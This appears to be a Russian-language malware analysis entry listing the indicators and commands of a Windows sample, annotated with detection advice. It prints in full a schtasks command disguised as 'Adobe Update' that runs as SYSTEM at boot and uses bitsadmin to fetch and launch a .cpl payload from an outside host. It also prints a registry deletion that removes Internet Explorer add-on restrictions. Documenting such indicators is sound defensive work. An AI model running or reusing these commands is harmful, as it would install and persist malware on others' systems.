Техническая информация
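- %WINDIR%\Tasks\Adobe Update.job
  (файл задания планировщика Windows; то же имя «Adobe Update» используется в командах schtasks ниже и, по-видимому, выбрано для маскировки под легитимное обновление)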
- '<SYSTEM32>\ping.exe' -n 60 127.0.0.1
- '<SYSTEM32>\ping.exe' -n 5 127.0.0.1
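- '<SYSTEM32>\reg.exe' DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID /F
  (в этом ключе хранится заданный политикой список надстроек Internet Explorer; его удаление снимает такие ограничения, поэтому исчезновение ключа стоит отслеживать как признак изменения настроек безопасности браузера)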
- '<SYSTEM32>\schtasks.exe' /RUN /TN "Adobe Update"
- '<SYSTEM32>\taskkill.exe' /im iexplore.exe /f
- '<SYSTEM32>\schtasks.exe' /Delete /TN "Adobe Update" /F
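- '<SYSTEM32>\schtasks.exe' /CREATE /SC onstart /TN "Adobe Update" /TR "cmd /c ping -n 60 127.0.0.1 &bitsadmin /transfer My /Download /Priority HIGH http://vi##obox.pt/d001.jpg %TEMP%\d001.cpl &%TEMP%\d001.cpl" /ru SYSTEM
  (задание выполняется при каждом запуске системы от имени SYSTEM: после задержки через ping оно загружает с помощью bitsadmin файл с расширением .jpg, сохраняет его в %TEMP% с расширением .cpl и запускает. Для обнаружения полезно отслеживать создание заданий планировщика, в командной строке которых есть bitsadmin, несовпадение расширения загружаемого и сохраняемого файла, а также запуск .cpl из %TEMP%.)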
- iexplore.exe
- ClassName: 'MS_WINHELP' WindowName: '(null)'
- ClassName: '(null)' WindowName: '(null)'